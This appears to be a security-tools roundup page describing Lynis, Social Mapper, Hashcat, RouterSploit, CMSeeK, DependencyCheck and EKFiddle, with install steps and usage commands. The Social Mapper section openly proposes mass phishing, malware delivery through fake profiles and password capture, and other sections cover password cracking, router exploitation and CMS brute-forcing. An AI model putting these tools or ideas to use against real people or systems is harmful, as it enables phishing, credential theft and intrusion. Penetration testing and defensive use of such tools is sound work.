
Lynis 2.6.7 - Security Auditing Tool for Unix/Linux Systems


We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to its core functions. These changes are the next step in the simplification improvements we have been making. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. Because it runs on the host itself, it performs more extensive security scans than network-based vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is lightweight and easy to use. Installation is optional: just copy it to a system and run "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL).
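For example, a minimal first run looks like this (assuming you fetch the tool from its GitHub repository):
git clone https://github.com/CISOfy/lynis
cd lynis
./lynis audit system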

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of a set of steps, from initialization of the program up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.
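As a quick sketch (the paths below are the usual Linux defaults and may differ on your system), warnings and suggestions can be pulled straight from the report file:
grep -E '^(warning|suggestion)' /var/log/lynis-report.dat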

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. If the Apache scan then discovers an SSL/TLS configuration, it will perform additional auditing steps on that and collect any discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs tests specific to a particular standard.

Changelog
Upgrade note
## Lynis 2.6.7

### Changed
- BOOT-5104 - Added busybox as a service manager
- KRNL-5677 - Limit PAE and no-execute test to AMD64 hardware only
- LOGG-2190 - Ignore /dev/zero and /dev/[aio] as deleted files
- SSH-7408 - Changed classification of SSH root login with keys
- Docker scan uses new format for maintainer value
- New URL structure on CISOfy website implemented for Lynis controls



Social Mapper - A Social Media Enumeration & Correlation Tool


A Social Media Mapping Tool that correlates profiles via facial recognition, by Jacob Wilkin (Greenwolf).
Social Mapper is an Open Source Intelligence tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets' names and pictures to accurately detect and group a person's presence, outputting the results into a report that a human operator can quickly review.
Social Mapper has a variety of uses in the security industry, for example the automated gathering of large numbers of social media profiles for use in targeted phishing campaigns. Facial recognition aids this process by removing false positives from the search results, so that reviewing this data is quicker for a human operator.

Social Mapper supports the following social media platforms:
  • LinkedIn
  • Facebook
  • Twitter
  • GooglePlus
  • Instagram
  • VKontakte
  • Weibo
  • Douban
Social Mapper takes a variety of input types such as:
  • An organisation's name, searching via LinkedIn
  • A folder full of named images
  • A CSV file with names and URLs to images online

Use cases (Why you want to run this)
Social Mapper is primarily aimed at penetration testers and red teamers, who will use it to expand their target lists and find their social media profiles. From here, what you do is only limited by your imagination, but here are a few ideas to get started:
(Note: Social Mapper does not perform these attacks; it gathers the data you need to perform them on a mass scale.)
  • Create fake social media profiles to 'friend' the targets and send them links or malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.
  • Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.
  • Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.
  • View target photos looking for employee access card badges and familiarise yourself with building interiors.

Getting Started
These instructions will show you the requirements for and how to use Social Mapper.

Prerequisites
As this is a Python-based tool, it should theoretically run on Linux, Mac and Windows. The main requirements are Firefox, Selenium and Geckodriver. To install and set up the tool, follow these four steps:
Install the latest version of Mozilla Firefox here:
https://www.mozilla.org/en-GB/firefox/new/
Install Geckodriver for your operating system and make sure it's in your path; on Mac you can place it in /usr/local/bin and on Linux in /usr/bin. You can download it here:
https://github.com/mozilla/geckodriver/releases
Install the required Python 2.7 libraries:
git clone https://github.com/SpiderLabs/social_mapper
cd social_mapper/setup
pip install -r requirements.txt
Provide Social Mapper with credentials to log into social media services:
Open social_mapper.py and enter social media credentials into the global variables at the top of the file.
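For illustration, the edit might look like the sketch below; the variable names here are placeholders, so check the top of social_mapper.py for the real ones:
# hypothetical placeholder names - see the top of social_mapper.py for the real variables
linkedin_username = "user@example.com"
linkedin_password = "example-password"
facebook_username = "user@example.com"
facebook_password = "example-password"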

Using Social Mapper
Social Mapper is run from the command line using a mix of required and optional parameters. You can specify options such as input type and which sites to check alongside a number of other parameters which affect speed and accuracy.

Required Parameters
To start the tool, three parameters must be provided: an input format, the input file or folder, and the basic running mode:
-f, --format : Specify if the -i, --input is a 'name', 'csv', 'imagefolder' or 'socialmapper' resume file
-i, --input : The company name, a CSV file, image folder or Social Mapper HTML file to feed into Social Mapper
-m, --mode : 'fast' or 'accurate'; allows you to choose to skip potential targets after a first likely match is found, in some cases speeding up the program by up to 20x
Additionally at least one social media site to check must be selected by including one or more of the following:
-a, --all    : Selects all of the options below and checks every site that social mapper has credentials for
-fb, --facebook : Check Facebook
-tw, --twitter : Check Twitter
-ig, --instagram : Check Instagram
-li, --linkedin : Check LinkedIn
-gp, --googleplus : Check GooglePlus
-vk, --vkontakte : Check VKontakte
-wb, --weibo : Check Weibo
-db, --douban : Check Douban

Optional Parameters
Additional optional parameters can be set to further customise the way Social Mapper runs:
-t, --threshold : Customises the facial recognition threshold for matches; this can be seen as the match accuracy. Default is 'standard', but it can be set to 'loose', 'standard', 'strict' or 'superstrict'. For example, 'loose' will find more matches, but some may be incorrect, while 'strict' may find fewer matches but also fewer false positives in the final report.
-cid, --companyid : Additional parameter to supply a LinkedIn company ID for when name searches are not picking the correct company.
-s, --showbrowser : Makes the Firefox browser visible so you can see the searches performed. Useful for debugging.
-v, --version : Display current version

Example Runs
Here are a couple of example runs to get started for differing use cases:
A quick run for Facebook and Twitter on some targets you have in an image folder, which you plan to review manually and don't mind some false positives:
python social_mapper.py -f imagefolder -i ./mytargets -m fast -fb -tw

An exhaustive run on a large company where false positives must be kept to a minimum:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -a -t strict

A large run that needs to be split over multiple sessions due to time, the first run doing LinkedIn and Facebook, with the second resuming and filling in Twitter, Google Plus and Instagram:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -li -fb
python social_mapper.py -f socialmapper -i ./SpiderLabs-social-mapper-linkedin-facebook.html -m accurate -tw -gp -ig

Troubleshooting
Social Media sites often change their page formats and class names, if Social Mapper isn't working for you on a specific site, check out the docs section for troubleshooting advice on how to fix it. Please feel free to submit a pull request with your fixes.

Maltego
For a guide to loading your Social Mapper results into Maltego, check out the docs section.

Authors



Hashcat v4.2.1 - World's Fastest and Most Advanced Password Recovery Utility


hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking.

Installation
Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.
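For example, for this release the command might look like this (the archive name is assumed from the version in the title):
7z x hashcat-4.2.1.7z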

GPU Driver requirements:
  • AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
  • AMD GPUs on Linux require "AMDGPU-PRO Driver" (16.40 or later)
  • Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
  • Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
  • Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
  • NVIDIA GPUs require "NVIDIA Driver" (367.x or later)

Features

  • World's fastest password cracker
  • World's first and only in-kernel rule engine
  • Free
  • Open-Source (MIT License)
  • Multi-OS (Linux, Windows and OSX)
  • Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
  • Multi-Hash (Cracking multiple hashes at the same time)
  • Multi-Devices (Utilizing multiple devices in same system)
  • Multi-Device-Types (Utilizing mixed device types in same system)
  • Supports distributed cracking networks (using overlay)
  • Supports interactive pause / resume
  • Supports sessions
  • Supports restore
  • Supports reading password candidates from file and stdin
  • Supports hex-salt and hex-charset
  • Supports automatic performance tuning
  • Supports automatic keyspace ordering markov-chains
  • Built-in benchmarking system
  • Integrated thermal watchdog
  • 200+ Hash-types implemented with performance in mind
  • ... and much more

Algorithms

  • MD4
  • MD5
  • Half MD5 (left, mid, right)
  • SHA1
  • SHA-224
  • SHA-256
  • SHA-384
  • SHA-512
  • SHA-3 (Keccak)
  • BLAKE2b-512
  • SipHash
  • Skip32
  • RIPEMD-160
  • Whirlpool
  • DES (PT = $salt, key = $pass)
  • 3DES (PT = $salt, key = $pass)
  • ChaCha20
  • GOST R 34.11-94
  • GOST R 34.11-2012 (Streebog) 256-bit
  • GOST R 34.11-2012 (Streebog) 512-bit
  • md5($pass.$salt)
  • md5($salt.$pass)
  • md5(unicode($pass).$salt)
  • md5($salt.unicode($pass))
  • md5($salt.$pass.$salt)
  • md5($salt.md5($pass))
  • md5($salt.md5($salt.$pass))
  • md5($salt.md5($pass.$salt))
  • md5(md5($pass))
  • md5(md5($pass).md5($salt))
  • md5(strtoupper(md5($pass)))
  • md5(sha1($pass))
  • sha1($pass.$salt)
  • sha1($salt.$pass)
  • sha1(unicode($pass).$salt)
  • sha1($salt.unicode($pass))
  • sha1(sha1($pass))
  • sha1($salt.sha1($pass))
  • sha1(md5($pass))
  • sha1($salt.$pass.$salt)
  • sha1(CX)
  • sha256($pass.$salt)
  • sha256($salt.$pass)
  • sha256(unicode($pass).$salt)
  • sha256($salt.unicode($pass))
  • sha512($pass.$salt)
  • sha512($salt.$pass)
  • sha512(unicode($pass).$salt)
  • sha512($salt.unicode($pass))
  • HMAC-MD5 (key = $pass)
  • HMAC-MD5 (key = $salt)
  • HMAC-SHA1 (key = $pass)
  • HMAC-SHA1 (key = $salt)
  • HMAC-SHA256 (key = $pass)
  • HMAC-SHA256 (key = $salt)
  • HMAC-SHA512 (key = $pass)
  • HMAC-SHA512 (key = $salt)
  • PBKDF2-HMAC-MD5
  • PBKDF2-HMAC-SHA1
  • PBKDF2-HMAC-SHA256
  • PBKDF2-HMAC-SHA512
  • MyBB
  • phpBB3
  • SMF (Simple Machines Forum)
  • vBulletin
  • IPB (Invision Power Board)
  • WBB (Woltlab Burning Board)
  • osCommerce
  • xt:Commerce
  • PrestaShop
  • MediaWiki B type
  • WordPress
  • Drupal 7
  • Joomla
  • PHPS
  • Django (SHA-1)
  • Django (PBKDF2-SHA256)
  • Episerver
  • ColdFusion 10+
  • Apache MD5-APR
  • MySQL
  • PostgreSQL
  • MSSQL
  • Oracle H: Type (Oracle 7+)
  • Oracle S: Type (Oracle 11+)
  • Oracle T: Type (Oracle 12+)
  • Sybase
  • hMailServer
  • DNSSEC (NSEC3)
  • IKE-PSK
  • IPMI2 RAKP
  • iSCSI CHAP
  • CRAM-MD5
  • MySQL CRAM (SHA1)
  • PostgreSQL CRAM (MD5)
  • SIP digest authentication (MD5)
  • WPA/WPA2
  • WPA/WPA2 PMK
  • NetNTLMv1
  • NetNTLMv1+ESS
  • NetNTLMv2
  • Kerberos 5 AS-REQ Pre-Auth etype 23
  • Kerberos 5 TGS-REP etype 23
  • Netscape LDAP SHA/SSHA
  • FileZilla Server
  • LM
  • NTLM
  • Domain Cached Credentials (DCC), MS Cache
  • Domain Cached Credentials 2 (DCC2), MS Cache 2
  • DPAPI masterkey file v1 and v2
  • MS-AzureSync PBKDF2-HMAC-SHA256
  • descrypt
  • bsdicrypt
  • md5crypt
  • sha256crypt
  • sha512crypt
  • bcrypt
  • scrypt
  • macOS v10.4
  • macOS v10.5
  • macOS v10.6
  • macOS v10.7
  • macOS v10.8
  • macOS v10.9
  • macOS v10.10
  • iTunes backup < 10.0
  • iTunes backup >= 10.0
  • AIX {smd5}
  • AIX {ssha1}
  • AIX {ssha256}
  • AIX {ssha512}
  • Cisco-ASA MD5
  • Cisco-PIX MD5
  • Cisco-IOS $1$ (MD5)
  • Cisco-IOS type 4 (SHA256)
  • Cisco $8$ (PBKDF2-SHA256)
  • Cisco $9$ (scrypt)
  • Juniper IVE
  • Juniper NetScreen/SSG (ScreenOS)
  • Juniper/NetBSD sha1crypt
  • Fortigate (FortiOS)
  • Samsung Android Password/PIN
  • Windows Phone 8+ PIN/password
  • GRUB 2
  • CRC32
  • RACF
  • Radmin2
  • Redmine
  • PunBB
  • OpenCart
  • Atlassian (PBKDF2-HMAC-SHA1)
  • Citrix NetScaler
  • SAP CODVN B (BCODE)
  • SAP CODVN F/G (PASSCODE)
  • SAP CODVN H (PWDSALTEDHASH) iSSHA-1
  • PeopleSoft
  • PeopleSoft PS_TOKEN
  • Skype
  • WinZip
  • 7-Zip
  • RAR3-hp
  • RAR5
  • AxCrypt
  • AxCrypt in-memory SHA1
  • PDF 1.1 - 1.3 (Acrobat 2 - 4)
  • PDF 1.4 - 1.6 (Acrobat 5 - 8)
  • PDF 1.7 Level 3 (Acrobat 9)
  • PDF 1.7 Level 8 (Acrobat 10 - 11)
  • MS Office <= 2003 MD5
  • MS Office <= 2003 SHA1
  • MS Office 2007
  • MS Office 2010
  • MS Office 2013
  • Lotus Notes/Domino 5
  • Lotus Notes/Domino 6
  • Lotus Notes/Domino 8
  • Bitcoin/Litecoin wallet.dat
  • Blockchain, My Wallet
  • Blockchain, My Wallet, V2
  • 1Password, agilekeychain
  • 1Password, cloudkeychain
  • LastPass
  • Password Safe v2
  • Password Safe v3
  • KeePass 1 (AES/Twofish) and KeePass 2 (AES)
  • JKS Java Key Store Private Keys (SHA1)
  • Ethereum Wallet, PBKDF2-HMAC-SHA256
  • Ethereum Wallet, SCRYPT
  • eCryptfs
  • Android FDE <= 4.3
  • Android FDE (Samsung DEK)
  • TrueCrypt
  • VeraCrypt
  • LUKS
  • Plaintext

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict
* accepts Rules
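As a sketch of how these modes map to the command line (hash mode 0 is MD5; the hash and wordlist file names are placeholders):
  • Straight (with rules): hashcat -m 0 -a 0 -r rules/best64.rule hashes.txt wordlist.txt
  • Combination: hashcat -m 0 -a 1 hashes.txt left.txt right.txt
  • Brute-force (mask): hashcat -m 0 -a 3 hashes.txt ?u?l?l?l?l?d?d
  • Hybrid dict + mask: hashcat -m 0 -a 6 hashes.txt wordlist.txt ?d?d
  • Hybrid mask + dict: hashcat -m 0 -a 7 hashes.txt ?d?d wordlist.txt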

Supported OpenCL runtimes

  • AMD
  • Apple
  • Intel
  • Mesa (Gallium)
  • NVidia
  • pocl

Supported OpenCL device types

  • GPU
  • CPU
  • APU
  • DSP
  • FPGA
  • Coprocessor

    RouterSploit v3.3.0 - Exploitation Framework For Embedded Devices


    The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.

    It consists of various modules that aid penetration testing operations:
    • exploits - modules that take advantage of identified vulnerabilities
    • creds - modules designed to test credentials against network services
    • scanners - modules that check if a target is vulnerable to any exploit
    • payloads - modules that are responsible for generating payloads for various architectures and injection points
    • generic - modules that perform generic attacks


    Installation

    Requirements
    Required:
    • future
    • requests
    • paramiko
    • pysnmp
    • pycrypto
    Optional:
    • bluepy - bluetooth low energy

    Installation on Kali Linux
    apt-get install python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py
    Bluetooth Low Energy support:
    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

    Installation on Ubuntu 18.04 & 17.10
    sudo add-apt-repository universe
    sudo apt-get install git python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py
    Bluetooth Low Energy support:
    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

    Installation on OSX
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    sudo python3 -m pip install -r requirements.txt
    python3 rsf.py

    Running on Docker
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    docker build -t routersploit .
    docker run -it --rm routersploit

    Update
    Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
    cd routersploit
    git pull
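    Once rsf.py is up, a typical console session looks like the sketch below (the module choice and target address are illustrative):
    rsf > use scanners/autopwn
    rsf (AutoPwn) > set target 192.168.1.1
    rsf (AutoPwn) > run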


    CMSeeK v1.0.7 - CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 50 Other CMSs)


    What is a CMS?
    A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some notable examples are WordPress, Joomla and Drupal.

    Release History
    - Version 1.0.7 [07-08-2018]
    - Version 1.0.6 [23-07-2018]
    - Version 1.0.5 [19-07-2018]
    - Version 1.0.4 [17-07-2018]
    - Version 1.0.3 [06-07-2018]
    - Version 1.0.2 [06-07-2018]
    - Version 1.0.1 [19-06-2018]
    - Version 1.0.0 [15-06-2018]
    Changelog File

    Functions Of CMSeeK:
    • Basic CMS Detection of over 30 CMS
    • Drupal version detection
    • Advanced WordPress Scans
      • Detects Version
      • User Enumeration
      • Plugins Enumeration
      • Theme Enumeration
      • Detects Users (3 Detection Methods)
      • Looks for Version Vulnerabilities and much more!
    • Advanced Joomla Scans
      • Version detection
      • Backup files finder
      • Admin page finder
      • Core vulnerability detection
      • Directory listing check
      • Config leak detection
      • Various other checks
    • Modular bruteforce system
      • Use pre made bruteforce modules or create your own and integrate with it

    Requirements and Compatibility:
    CMSeeK is built using Python 3, so you will need Python 3 to run this tool; it is compatible with Unix-based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-updates, so make sure git is installed.

    Installation and Usage:
    It is fairly easy to use CMSeeK; just make sure you have python3 and git (just for cloning the repo) installed, and use the following commands:
    • git clone https://github.com/Tuhinshubhra/CMSeeK
    • cd CMSeeK
    For guided scanning:
    • python3 cmseek.py
    Else:
    • python3 cmseek.py -u <target_url> [...]
    Help menu from the program:
    USAGE:
    python3 cmseek.py (for a guided scanning) OR
    python3 cmseek.py [OPTIONS] <Target Specification>

    SPECIFYING TARGET:
    -u URL, --url URL Target Url
    -l LIST, -list LIST path of the file containing list of sites
    for multi-site scan (comma separated)

    USER AGENT:
    -r, --random-agent Use a random user agent
    --user-agent USER_AGENT Specify custom user agent

    OUTPUT:
    -v, --verbose Increase output verbosity

    VERSION & UPDATING:
    --update Update CMSeeK (Requires git)
    --version Show CMSeeK version and exit

    HELP & MISCELLANEOUS:
    -h, --help Show this help message and exit
    --clear-result Delete all the scan result

    EXAMPLE USAGE:
    python3 cmseek.py -u example.com # Scan example.com
    python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
    python3 cmseek.py -u example.com --user-agent "Mozilla 5.0" # Scan example.com using the custom user agent "Mozilla 5.0"
    python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
    python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com

    Checking For Update:
    You can check for updates either from the main menu, or use python3 cmseek.py --update to check for and apply updates automatically.
    P.S.: Please make sure you have git installed; CMSeeK uses git to apply auto-updates.

    Detection Methods:
    CMSeeK detects CMSs via the following:
    • HTTP Headers
    • Generator meta tag
    • Page source code
    • robots.txt

    Supported CMSs:
    CMSeeK can currently detect 40 CMSs; you can find the list in the cmss.py file in the cmseekdb directory. All the CMSs are stored in the following way:
    cmsID = {
        'name': 'Name Of CMS',
        'url': 'Official URL of the CMS',
        'vd': 'Version Detection (0 for no, 1 for yes)',
        'deeps': 'Deep Scan (0 for no, 1 for yes)'
    }
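    For instance, a hypothetical WordPress entry following that layout could look like this (values illustrative; see cmss.py for the real entries):
    wp = {
        'name': 'WordPress',
        'url': 'https://wordpress.org',
        'vd': '1',
        'deeps': '1'
    }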

    Scan Result:
    All of your scan results are stored in a JSON file named cms.json; you can find the logs inside the Result/<Target Site> directory, and the bruteforce results are stored in a txt file under the site's result directory as well.
    Here is an example of the json report log:


    Bruteforce Modules:
    CMSeeK has a modular bruteforce system, meaning you can add your own custom-made bruteforce modules to work with it. Proper documentation for creating modules will be written shortly, but if you have already figured it out (it's pretty easy once you analyze the pre-made modules), all you need to do is this:
    1. Add a comment exactly like this: # <Name Of The CMS> Bruteforce module. This helps CMSeeK learn the name of the CMS using regex.
    2. Add another comment: ### cmseekbruteforcemodule. This lets CMSeeK know it is a module.
    3. Copy the module into the brutecms directory under CMSeeK's directory.
    4. Open CMSeeK and rebuild the cache using U as the input in the first menu.
    5. If everything is done right you'll see something like this (refer to the screenshot below), and your module will be listed in the bruteforce menu the next time you open CMSeeK.

    Need More Reasons To Use CMSeeK?
    If nothing else, you can always enjoy exiting CMSeeK (please don't); it will bid you goodbye with a random message in one of various languages.
    You can also try reading the comments in the code; they are pretty random and weird!

    Screenshots:




    DependencyCheck v3.3.1 - A Software Composition Analysis Utility That Detects Publicly Disclosed Vulnerabilities In Application Dependencies


    Dependency-Check is a Software Composition Analysis (SCA) tool that attempts to detect publicly disclosed vulnerabilities contained within a project's dependencies. It does this by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If found, it will generate a report linking to the associated CVE entries.
    Documentation and links to production binary releases can be found on the github pages. Additionally, more information about the architecture and ways to extend dependency-check can be found on the wiki.

    Current Releases

    Jenkins Plugin
    For instructions on the use of the Jenkins plugin please see the OWASP Dependency-Check Plugin page.

    Command Line
    More detailed instructions can be found on the dependency-check github pages. The latest CLI can be downloaded from bintray's dependency-check page.
    On *nix
    $ ./bin/dependency-check.sh -h
    $ ./bin/dependency-check.sh --project Testing --out . --scan [path to jar files to be scanned]
    On Windows
    > .\bin\dependency-check.bat -h
    > .\bin\dependency-check.bat --project Testing --out . --scan [path to jar files to be scanned]
    On Mac with Homebrew
    $ brew update && brew install dependency-check
    $ dependency-check -h
    $ dependency-check --project Testing --out . --scan [path to jar files to be scanned]

    Maven Plugin
    More detailed instructions can be found on the dependency-check-maven github pages. By default, the plugin is tied to the verify phase (i.e. mvn verify). Alternatively, one can directly invoke the plugin via mvn org.owasp:dependency-check-maven:check.
    The dependency-check plugin can be configured using the following:
    <project>
        <build>
            <plugins>
                ...
                <plugin>
                    <groupId>org.owasp</groupId>
                    <artifactId>dependency-check-maven</artifactId>
                    <executions>
                        <execution>
                            <goals>
                                <goal>check</goal>
                            </goals>
                        </execution>
                    </executions>
                </plugin>
                ...
            </plugins>
            ...
        </build>
        ...
    </project>

    Ant Task
    For instructions on the use of the Ant Task, please see the dependency-check-ant github page.

    Development Usage
    The following instructions outline how to compile and use the current snapshot. While every intention is to maintain a stable snapshot it is recommended that the release versions listed above be used.
    The repository has some large files due to test resources. The team has tried to clean up the history as much as possible. However, it is recommended that you perform a shallow clone to save yourself time:
    git clone --depth 1 https://github.com/jeremylong/DependencyCheck.git
    On *nix
    $ mvn install
    $ ./cli/target/release/bin/dependency-check.sh -h
    $ ./cli/target/release/bin/dependency-check.sh --project Testing --out . --scan ./src/test/resources
    On Windows
    > mvn install
    > .\dependency-check-cli\target\release\bin\dependency-check.bat -h
    > .\dependency-check-cli\target\release\bin\dependency-check.bat --project Testing --out . --scan ./src/test/resources
    Then load the resulting 'dependency-check-report.html' into your favorite browser.

    Docker
    In the following example it is assumed that the source to be checked is in the current working directory. Persistent data and report directories are used, allowing you to destroy the container after running.
    #!/bin/sh

    OWASPDC_DIRECTORY=$HOME/OWASP-Dependency-Check
    DATA_DIRECTORY="$OWASPDC_DIRECTORY/data"
    REPORT_DIRECTORY="$OWASPDC_DIRECTORY/reports"

    if [ ! -d "$DATA_DIRECTORY" ]; then
        echo "Initially creating persistent directories"
        mkdir -p "$DATA_DIRECTORY"
        chmod -R 777 "$DATA_DIRECTORY"

        mkdir -p "$REPORT_DIRECTORY"
        chmod -R 777 "$REPORT_DIRECTORY"
    fi

    # Make sure we are using the latest version
    docker pull owasp/dependency-check

    docker run --rm \
        --volume $(pwd):/src \
        --volume "$DATA_DIRECTORY":/usr/share/dependency-check/data \
        --volume "$REPORT_DIRECTORY":/report \
        owasp/dependency-check \
        --scan /src \
        --format "ALL" \
        --project "My OWASP Dependency Check Project" \
        --out /report
    # Use suppression like this: (/src == $pwd)
    # --suppression "/src/security/dependency-check-suppression.xml"

    Upgrade Notes

    Upgrading from 1.x.x to 2.x.x
    Note that when upgrading from version 1.x.x that the following changes will need to be made to your configuration.

    Suppression file
    In order to support multiple suppression files, the mechanism for configuring suppression files has changed. As such, users that have defined a suppression file in their configuration will need to update.
    See the examples below:

    Ant
    Old:
    <dependency-check
        failBuildOnCVSS="3"
        suppressionFile="suppression.xml">
    </dependency-check>
    New:
    <dependency-check
        failBuildOnCVSS="3">
        <suppressionFile path="suppression.xml" />
    </dependency-check>

    Maven
    Old:
    <plugin>
        <groupId>org.owasp</groupId>
        <artifactId>dependency-check-maven</artifactId>
        <configuration>
            <suppressionFile>suppression.xml</suppressionFile>
        </configuration>
    </plugin>
    New:
    <plugin>
        <groupId>org.owasp</groupId>
        <artifactId>dependency-check-maven</artifactId>
        <configuration>
            <suppressionFiles>
                <suppressionFile>suppression.xml</suppressionFile>
            </suppressionFiles>
        </configuration>
    </plugin>

    Gradle
    In addition to the changes to the suppression file, the task dependencyCheck has been renamed to dependencyCheckAnalyze.
    Old:
    buildscript {
        repositories {
            mavenLocal()
        }
        dependencies {
            classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
        }
    }
    apply plugin: 'org.owasp.dependencycheck'

    dependencyCheck {
        suppressionFile='path/to/suppression.xml'
    }
    check.dependsOn dependencyCheckAnalyze
    New:
    buildscript {
        repositories {
            mavenLocal()
        }
        dependencies {
            classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
        }
    }
    apply plugin: 'org.owasp.dependencycheck'

    dependencyCheck {
        suppressionFiles = ['path/to/suppression1.xml', 'path/to/suppression2.xml']
    }
    check.dependsOn dependencyCheckAnalyze


    EKFiddle - A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General


    A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.

    Installation

    Download and install the latest version of Fiddler
    https://www.telerik.com/fiddler
    Special instructions for Linux and Mac here:
    https://www.telerik.com/blogs/fiddler-for-linux-beta-is-here
    https://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1

    Enable C# scripting (Windows only)
    Launch Fiddler, and go to Tools -> Options
    In the Scripting tab, change the default (JScript.NET) to C#.

    Change default text editor (optional)
    In the same Tools -> Options menu, click on the Tools tab.
    • Windows: notepad.exe or notepad++.exe
    • Linux: gedit
    • Mac: /Applications/TextEdit.app or /Applications/TextWrangler.app
    Close Fiddler

    Download or clone CustomRules.cs into the appropriate folder based on your operating system:
    • Windows (7/10) C:\Users\[username]\Documents\Fiddler2\Scripts\
    • Ubuntu /home/[username]/Fiddler2/Scripts/
    • Mac /Users/[username]/Fiddler2/Scripts/

    Finish up the installation
    Start Fiddler to complete the installation of EKFiddle. That's it, you're all set!

    Features

    Toolbar buttons
    The added toolbar buttons give you quick shortcuts to some of the main features:


    QuickSave
    Dumps the current web sessions into a SAZ file (named QuickSave-"MM-dd-yyyy-HH-mm-ss".saz) in the EKFiddle\Captures folder.

    UI mode
    Toggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).

    VPN
    VPN GUI built directly into Fiddler. It uses the OpenVPN client on Windows and Linux with .ovpn files (signing up with a commercial VPN provider may be required). It will open a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous one to ensure only one TAP adapter is used at any given time.
    • Windows
    Download and install OpenVPN in default directory
    Place your .ovpn files inside OpenVPN's config folder.
    • Linux (tested on Ubuntu 16.04)
    sudo apt-get install openvpn
    Place your .ovpn files in /etc/openvpn.

    Proxy
    Allows you to connect to an upstream proxy (HTTP/s or SOCKS).

    Import SAZ/PCAP
    A shortcut to load SAZ (Fiddler's native format) or PCAP (i.e. from Wireshark) captures.

    View/Edit Regexes
    View and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.

    Run Regexes
    Run the master and custom regular expressions against current web sessions.

    Clear Markings
    Clear any comment and colour highlighting in the currently loaded sessions.

    ContextAction menu
    The ContextAction menu (accessed by right-clicking on any session(s)) allows you to perform additional commands on the selected sessions. This can be very helpful for quick lookups, computing hashes or extracting IOCs.

    Hostname or IP address (Google Search, RiskIQ, URLQuery)
    Query the hostname for the currently selected session.

    URI

    Build Regex
    Create a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.

    Open in... Internet Explorer, Chrome, Firefox, Edge
    This opens up the URI with the browser you selected.

    Response Body

    Remove encoding
    Decodes the currently selected sessions (from their basic encoding).

